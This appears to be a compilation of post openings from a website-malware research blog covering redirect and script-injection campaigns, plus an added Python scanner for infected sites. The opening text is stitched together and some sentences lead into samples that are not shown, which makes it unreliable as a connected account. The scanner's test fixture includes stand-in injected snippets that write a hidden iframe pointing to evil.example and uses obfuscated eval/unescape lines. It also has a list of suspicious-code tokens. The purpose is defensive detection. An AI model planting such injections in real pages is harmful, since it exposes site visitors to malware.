A few days ago Jindrich Kubec (Avast) pinged me that the RunForestRun malware changed the domain generating algorithm (DGA) and now uses waw.pl subdomains (instead of .ru) in malicious URLs.
I decided to take a look at the new scripts and found quite a few very interesting changes. This post will be about those changes.
It was a massive infection and many webmasters asked me to help them clean up their sites. I told them how to search for various patterns of malicious files and asked them to provide me with access logs and samples of the malicious code they found on their servers.
At first the hack looked quite mysterious:
The mystery was solved when I got access to one of the infected sites.
According to Betteridge’s Law of Headlines, “Any headline which ends in a question mark can be answered by the word ‘no’”. Nonetheless, I use this type of headline for this post because it was the question I asked myself when I came across the following attack.
A couple of years ago I wrote about malware attacks that used the Twitter API to generate domain names for their malicious sites, using trending topics as keys in the domain generating algorithm.
Since 2009, I’ve seen many revisions of that attack. It has never been the most prevalent issue but as far as I can tell it constantly evolves and mutates. The recent update of the malicious script injected by this attack looked quite interesting and I decided to find out what has changed since late 2009.
During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:
A few days ago I tweeted that “this year the most popular TLD for malicious sites is .CC”. I conducted some research on the most prevalent attacks that use the .CC TLD and now want to elaborate on what is going on.
Today, I can see many blacklisted sites where Google reports one of the following three domains as the source of the problem:
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
Two of the major trends in malware attacks described on this blog this summer were the use of hijacked DNS records of legitimate domains and continuous attacks against sites on MediaTemple and RackSpace. At the end of this September, I noticed a new attack that combined these two trends.
At a higher level, this attack is no different from many preceding variations that hit MediaTemple. It prepends malicious code to the first line of some existing .js files or injects it inside <ads>…</ads> tags at the bottom of the HTML code of legitimate web pages.
However, you soon notice new techniques.
This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML
A few days ago I noticed a new mass infection of sites on RackSpace. It mostly affects WordPress blogs and sites hosted under the same account as WordPress blogs.
Hackers create malicious .js files in some subdirectory of the compromised sites and inject links to those .js files into website pages.
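The two injection patterns described above (a payload prepended to the first line of existing .js files or dropped inside <ads>…</ads> tags at the bottom of a page, and links to attacker-created .js files in an unexpected subdirectory) are easy to triage with a small script. The one below is an added example written for this page; it is not code from Unmask Parasites or from the blog posts, and it does not reproduce any real injected payload. The sample site contents, the allowed script directory list and the obfuscation tokens are all constructed assumptions for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample of an infected site's files (path -> content). These are
# illustrative stand-ins written for this example, not code captured from the
# attacks described on the page.
SAMPLE_SITE: Dict[str, str] = {
    "index.html": (
        "<html><body><h1>Welcome</h1>\n"
        '<script src="/js/jquery.js"></script>\n'
        '<script src="/wp-content/uploads/cache/x.js"></script>\n'
        "</body></html>\n"
        "<ads><script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//evil.example/%22%3E'))</script></ads>\n"
    ),
    "about.html": '<html><body><script src="/js/site.js"></script>About us</body></html>\n',
    "js/jquery.js": "/*! jQuery stub */\nfunction $(){}\n",
    # first line carries an injected, obfuscated payload; the original file follows
    "js/site.js": "eval(unescape('%64%6F%63%75%6D%65%6E%74'));\n// original code\nfunction init(){}\n",
    "wp-content/uploads/cache/x.js": "document.write('<iframe src=\"http://evil.example/\"></iframe>');\n",
}

# Assumption for this example: legitimate scripts live only under these directories.
ALLOWED_JS_DIRS = ("js/",)

# Tokens commonly seen in obfuscated injected JavaScript (heuristic, not a signature).
SUSPICIOUS_JS_TOKENS = ("eval(", "unescape(", "document.write(", "fromCharCode(")

ADS_BLOCK_RE = re.compile(r"<ads>(.*?)</ads>", re.IGNORECASE | re.DOTALL)
SCRIPT_SRC_RE = re.compile(r"""<script[^>]*\ssrc=["']([^"']+)["']""", re.IGNORECASE)


def find_ads_blocks(html: str) -> List[str]:
    """Return the bodies of <ads>...</ads> blocks. <ads> is not an HTML element,
    so any occurrence deserves a look; the attack appends one at the bottom of the page."""
    return [m.group(1).strip() for m in ADS_BLOCK_RE.finditer(html)]


def first_line_is_suspicious(js: str, max_len: int = 200) -> bool:
    """Heuristic for a payload prepended to the first line of a .js file:
    obfuscation tokens on line 1, or a first line far longer than typical source."""
    first = js.split("\n", 1)[0]
    return len(first) > max_len or any(tok in first for tok in SUSPICIOUS_JS_TOKENS)


def unexpected_script_refs(html: str, allowed_dirs=ALLOWED_JS_DIRS) -> List[str]:
    """Return <script src> targets that point at .js files outside the allowed dirs
    (the 'links to malicious .js files in some subdirectory' pattern)."""
    refs = []
    for src in SCRIPT_SRC_RE.findall(html):
        path = src.split("?", 1)[0].lstrip("/")
        if path.lower().endswith(".js") and not path.startswith(allowed_dirs):
            refs.append(src)
    return refs


def scan_site(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Run all three checks over a path->content map and collect findings per file."""
    findings = {"ads_blocks": [], "suspicious_js": [], "unexpected_script_refs": []}
    for path, content in sorted(files.items()):
        lower = path.lower()
        if lower.endswith((".html", ".htm", ".php")):
            if find_ads_blocks(content):
                findings["ads_blocks"].append(path)
            findings["unexpected_script_refs"].extend(
                f"{path} -> {src}" for src in unexpected_script_refs(content))
        elif lower.endswith(".js") and first_line_is_suspicious(content):
            findings["suspicious_js"].append(path)
    return findings


if __name__ == "__main__":
    for kind, hits in scan_site(SAMPLE_SITE).items():
        print(kind, hits)
```

To run this against a real site, build the dictionary from the document root (for example with os.walk) and review every hit by hand: the first-line heuristic will also fire on legitimately minified libraries whose entire source sits on one long line, and the allowed-directory list has to match how the site is actually laid out. The <ads> check is the most reliable of the three, since that tag has no legitimate use in HTML.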
Occasional posts from the developer of Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.